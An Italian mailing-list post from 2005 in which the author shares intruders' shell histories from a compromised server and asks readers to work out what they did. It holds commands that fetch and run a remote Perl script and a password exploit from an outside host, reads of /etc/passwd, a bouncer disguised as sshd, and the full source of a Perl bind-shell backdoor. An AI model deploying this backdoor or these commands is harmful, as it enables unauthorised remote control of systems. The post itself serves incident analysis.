hacking ... lo studiamo ?

Gianmarco Giovannelli gmarco a giovannelli.it
Lun 28 Nov 2005 19:33:21 CET


Ho ricevuto questo messaggio da **** a proposito di un server bucato :-)

>      2  21:09   cd .psybsd
>      3  21:09   dir -la
>      4  21:09   cat psybnc.conf
>      5  21:10   rm -rf *
>      6  21:10   cd ..
>      7  21:10   cd ...
>      8  21:10   ls
>      9  21:10   cd psybnc
>     10  21:10   ls
>     11  21:10   export PATH="."
>     12  21:10   ./swapper
>     13  21:10   exit
>     14  16:49   w
>     15  16:49   ps -aux
>     16  16:49   dir -la
>     17  16:49   cd /var/tmp
>     18  16:49   dir -la
>     19  16:49   cd ...
>     20  16:49   dir
>     21  16:49   cd psybnc
>     22  16:49   ls
>     23  16:50   export
>     24  16:50   swapper
>     25  16:50   ps -aux
>     26  16:50   exit
>     27  16:54   cat /etc/passwd
>     28  16:56   last
>     29  16:59   last
>     30  16:59   w
>     31  16:59   ps -aux
>     32  16:59   exit
>     33  3:45    uname -a
>     34  3:45    bash
>     35  3:45    sh
>     36  3:49    exit
>     37  6:45    bash
>     38  6:45    sh
>     39  6:51    exit
>     40  11:59   /usr/bin/perl
>     41  11:59   ps x
>     42  11:59   ls
>     43  11:59   vi bds
>     44  11:59   perl bds
>     45  12:00   ps x
>     46  12:00   kill -9 76439 43695
>     47  12:00   ps x
>     48  12:00   exit
>     49  12:03   wget
>     50  12:03   curl
>     51  12:04   emacs
>     52  12:04   gwget
>     53  12:04   kget
>     54  12:04   kget www.com.com/q/1
>     55  12:05   kget www.com.com/q~./1
>     56  12:05   kget www.com.com/q.1
>     57  12:05   ls
>     58  12:05   kget www.com.com/q.1 1
>     59  12:05   touch 1
>     60  12:05   kget www.com.com/q.1 1
>     61  12:05   kget 1
>     62  12:05   cat 1
>     63  12:05   rm 1
>     64  12:06   gmake
>     65  12:06   fetch
>     66  12:07   fetch www.com.com
>     67  12:07   fetch http://slickland.com/rk/bds.txt -o b.txt
>     68  12:07   ls
>     69  12:08   head bds.txt
>     70  12:08   rm bds.txt
>     71  12:09   cd /tmp ; fetch http://slickland.com/rk/bds.txt ; 
> mv bds.txt bds.pl ; chmod 777 bds.pl ; perl bds.pl
>     72  12:09   ps x
>     73  12:09   kill -9 77329
>     74  12:10   cd ..
>     75  12:10   cd /
>     76  12:10   ls
>     77  12:13   exit
>     78  14:37   fetch slickland.com/xpl/bsdpass
>     79  14:38   fetch http://www.slickland.com/xpl/bsdpass
>     80  14:38   chmod +x bsdpass
>     81  14:38   ./bsdpass
>     82  14:38   rm bsdpass
>     83  14:38   vi bsdpass.c
>     84  14:38   gcc -o bsdpass bsdpass.c
>     85  14:39   ./bsdpass
>     86  14:40   ls
>     87  14:40   cat kmem
>     88  14:40   cat sendfile1
>     89  14:40   rm sendfile1
>     90  14:40   rm kmem
>     91  14:40   rm bsdpass.c
>     92  14:40   ls
>     93  14:40   ftp ftp.slickland.com
>     94  14:42   ftp ftp.slickland.com
>     95  14:43   rm bsdpass
>     96  14:43   ls
>     97  14:43   exit
>     98  23:48   history
>     99  23:48   history > hackterra.log
>    100  23:48   who
>    101  23:50   history
>
>ecco dbs.txt
>#!/usr/bin/perl ^M
>$port = 4132; ^M
>$hide = "vi";^M
>unlink($0); $0 = $hide . "\0" x16;^M
>$SIG{'INT'}='IGNORE';$SIG{'HUP'}='IGNORE';$SIG{'TERM'}='IGNORE';^M
>$SIG{'CHLD'}='IGNORE'; if(fork()){exit(0);};^M
>use Socket; $proto = getprotobyname('tcp');^M
>socket(SERVER,PF_INET,SOCK_STREAM,$proto);^M
>setsockopt(SERVER,SOL_SOCKET,SO_REUSEADDR,pack("l",1));^M
>bind(SERVER,sockaddr_in($port,INADDR_ANY));^M
>if(listen(SERVER,SOMAXCONN)) { print("## BDS Started. Port 
>$port\n"); } else { die "listen: $!" };^M
>for(;$paddr = accept(CLIENT,SERVER);close CLIENT)^M
>{^M
>    open(STDIN,">&CLIENT");open(STDOUT,">&CLIENT");open(STDERR,">&CLIENT");^M
>    print("## BDS backdoor by Slick\n\n");^M
>    while(1)^M
>    {^M
>    print("[cmd]# ");^M
>    if (fork() == 0) {^M
>      $cmd=<STDIN>;^M
>      chomp($cmd);^M
>      exec($cmd);^M
>      exit 0;^M
>                     }^M
>    wait;^M
>    }^M
>    close(STDIN);close(STDOUT);close(STDERR);^M
>}
>~
>
>mi piacerebbe vedere il file bsdpass.c


ed ecco l'utente info (pwd info, con tanto di shell  :-)

>ecco cosa ha fatto info
>
>      2  22:15   cd
>      3  22:15   w
>      4  22:15   cd ..
>      5  22:15   cd ..
>      6  22:15   cd ..
>      7  22:15   cd ..
>      8  22:15   cd ..
>      9  22:15   cd ..
>     10  22:15   cd ..
>     11  22:15   cd /
>     12  22:15   cd
>     13  22:15   cd //
>     14  22:15   cd .
>     15  22:16   cd usr
>     16  22:16   var
>     17  22:16   exit
>     18  6:58    cd /var/tmp/" "
>     19  6:58    cd .psybsd
>     20  6:58    ./httpd
>     21  6:59    cd
>     22  6:59    w
>     23  6:59    cd ..
>     24  6:59    cd ..
>     25  6:59    exit
>     26  7:10    cd /var/tmp
>     27  7:10    ls
>     28  7:10    cd" "
>     29  7:10    cd " "
>     30  7:10    ls
>     31  7:10    cd .psybsd
>     32  7:10    ./http
>     33  7:10    ./httpd
>     34  7:10    cd
>     35  7:10    cd ..
>     36  7:10    cd ..
>     37  7:10    cd ..
>     38  7:10    cd ..
>     39  7:10    w
>     40  7:10    exit
>     41  21:36   cd /var/tmp
>     42  21:36   ls
>     43  21:36   cd .``.``.
>     44  21:36   cd '" "cd " "
>     45  21:36   cd " "
>     46  21:36   ls
>     47  21:36   cd .psybsd
>     48  21:36   ./httpd
>     49  21:36   cd
>     50  21:36   exit
>     51  17:56   w
>     52  17:56   cd /var/tmp
>     53  17:56   ls
>     54  17:56   cd " "
>     55  17:56   ls
>     56  17:56   cd .psybsd
>     57  17:56   ls
>     58  17:56   pic psybnc.conf
>     59  17:57   ls
>     60  17:57   pic menuconf
>     61  17:58   pic psybnc.conf.old
>     62  17:59   pic log
>     63  18:05   uname -a
>     64  18:05   uname -s
>     65  18:05   w
>     66  18:06   cd ..
>     67  18:06   cd ..
>     68  18:06   cd
>     69  18:06   cd ..
>     70  18:06   cd ..
>     71  18:06   rm -rf .psybsd
>     72  18:06   ls
>     73  18:06   cd
>     74  18:06   cd ..
>     75  18:06   exit
>     76  18:06   cd /var/tmp/" "
>     77  18:07   rm -rf .psybsd
>     78  18:07   ls
>     79  18:07   ls -all
>     80  18:07   ftp
>     81  18:10   ps -x
>     82  18:10   killall -9 10745
>     83  18:11   cd .psybsd
>     84  18:11   ls
>     85  18:11   tar -xvzf psyBNC2.3.2-5.tar.gz
>     86  18:11   rm -rf psyBNC*
>     87  18:11   mv psybnc .psybsd
>     88  18:12   cd .psybsd
>     89  18:12   make
>     90  18:14   mv psybnc sshd
>     91  18:14   ls
>     92  18:14   ps -x
>     93  18:14   kill -9 10745
>     94  18:16   ./sshd
>     95  18:18   uname -a
>     96  18:19   cat /etc/hosts
>     97  18:20   cd
>     98  18:20   cd ..
>     99  18:20   cd ..
>    100  18:20   exit


Secondo voi che facevano ?






Best Regards,
Gianmarco Giovannelli ,  "Unix expert since yesterday"
http://utenti.gufi.org/~gmarco/



Maggiori informazioni sulla lista esperti